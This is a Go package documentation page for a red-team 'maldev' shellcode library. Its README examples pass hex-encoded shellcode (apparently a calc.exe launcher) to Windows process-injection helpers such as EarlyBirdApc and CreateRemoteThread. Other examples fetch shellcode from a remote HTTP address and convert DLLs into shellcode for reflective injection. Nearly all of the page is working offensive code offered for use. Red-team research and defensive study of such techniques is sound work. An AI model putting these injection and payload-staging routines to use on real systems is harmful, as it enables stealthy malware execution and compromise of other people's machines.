shellcode

package
v0.1.4 Latest Latest
Warning

This package is not in the latest version of its module.

Published: Aug 29, 2023 License: MIT Imports: 6 Imported by: 0

README

Shellcode Examples

  • This package provides useful functions to help red teamers with shellcode injection

* Keep in mind that many errors are not handled in the shellcode injection techniques because they usually return false errors, so a nil error does not by itself confirm that a technique succeeded. The techniques should nevertheless work as expected.

All Shellcode Injection Techniques

package main

import (
  "log"
  "encoding/hex"

  "github.com/D3Ext/maldev/shellcode"
)

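// main decodes a hex-encoded demo payload and passes it to each injection
// helper of the shellcode package in turn, aborting on the first error.
//
// The package README states that many errors inside the injection techniques
// are not handled, so a nil return here does not prove that the payload ran.
func main() {
	// The payload embeds the ASCII strings "calc" and "WinE", which is
	// consistent with the common calc.exe proof-of-concept launcher (the bytes
	// are not disassembled on this page).
	calcShellcode, err := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")
	if err != nil {
		// This error was previously discarded. hex.DecodeString returns the
		// bytes decoded before the failure, so a malformed literal would have
		// handed a truncated buffer to every call below.
		log.Fatal(err)
	}

	// Each helper is named after a publicly documented Windows injection
	// technique; the implementations are not shown on this page.
	if err := shellcode.CreateProcess(calcShellcode); err != nil {
		log.Fatal(err)
	}

	if err := shellcode.EarlyBirdApc(calcShellcode); err != nil {
		log.Fatal(err)
	}

	if err := shellcode.UuidFromStringA(calcShellcode); err != nil {
		log.Fatal(err)
	}

	// Per the package author, this technique does not exit until the process
	// ends.
	// NOTE(review): if that means the call blocks, the CreateRemoteThread call
	// below is never reached in this sequence; confirm against the package.
	if err := shellcode.Fibers(calcShellcode); err != nil {
		log.Fatal(err)
	}

	// Per the package author, this technique does not exit until the process
	// ends.
	if err := shellcode.CreateRemoteThread(calcShellcode); err != nil {
		log.Fatal(err)
	}
}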

Get shellcode from file

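package main

import (
	"fmt"
	"log"

	"github.com/D3Ext/maldev/shellcode"
)

// main loads raw bytes from ./shellcode.bin and prints them to stdout.
// Nothing is executed here: the listing only shows how the loader is called.
func main() {
	// Signature as listed in the package documentation:
	//   func GetShellcodeFromFile(file string) ([]byte, error)
	buf, err := shellcode.GetShellcodeFromFile("./shellcode.bin")
	if err != nil {
		log.Fatal(err)
	}

	// "fmt" was missing from the import block, so the original listing did not
	// compile.
	fmt.Println(buf)
}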

Get shellcode from remote url

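package main

import (
	"fmt"
	"log"

	"github.com/D3Ext/maldev/shellcode"
)

// main downloads raw bytes from a URL and prints them to stdout.
// Nothing is executed here: the listing only shows how the downloader is
// called.
func main() {
	// Signature as listed in the package documentation:
	//   func GetShellcodeFromUrl(sc_url string) ([]byte, error)
	//
	// The example URL is plain HTTP to a private (RFC 1918) address, so the
	// transfer is unencrypted and readable by network inspection. This page
	// shows no integrity check on the downloaded bytes.
	buf, err := shellcode.GetShellcodeFromUrl("http://192.168.1.6/shellcode.bin")
	if err != nil {
		log.Fatal(err)
	}

	// "fmt" was missing from the import block, so the original listing did not
	// compile.
	fmt.Println(buf)
}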

Convert DLL to shellcode

  • This function is useful for performing sRDI (Shellcode Reflective DLL Injection). It automatically detects the architecture (x86 or x64).
package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

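// main converts example.dll into a shellcode byte slice and reports its size.
// The result is neither written to disk nor executed.
func main() {
	// Signature as listed in the package documentation:
	//   func ConvertDllToShellcode(dll_file string, func_name string, data string) ([]byte, error)
	//
	// The function returns two values; the original listing assigned them to a
	// single variable and therefore did not compile.
	sc, err := shellcode.ConvertDllToShellcode("example.dll", "functionName", "")
	if err != nil {
		log.Fatal(err)
	}

	log.Printf("generated %d bytes of shellcode", len(sc))
}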

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func ConvertBytes added in v0.1.2

func ConvertBytes(dllBytes, functionHash, userData []byte) []byte

func ConvertDllToShellcode added in v0.1.2

func ConvertDllToShellcode(dll_file string, func_name string, data string) ([]byte, error)

func GetShellcodeFromFile

func GetShellcodeFromFile(file string) ([]byte, error)

func GetShellcodeFromUrl

func GetShellcodeFromUrl(sc_url string) ([]byte, error)

func WriteShellcodeToFile added in v0.1.2

func WriteShellcodeToFile(filename string, shellcode []byte) error

Types

This section is empty.
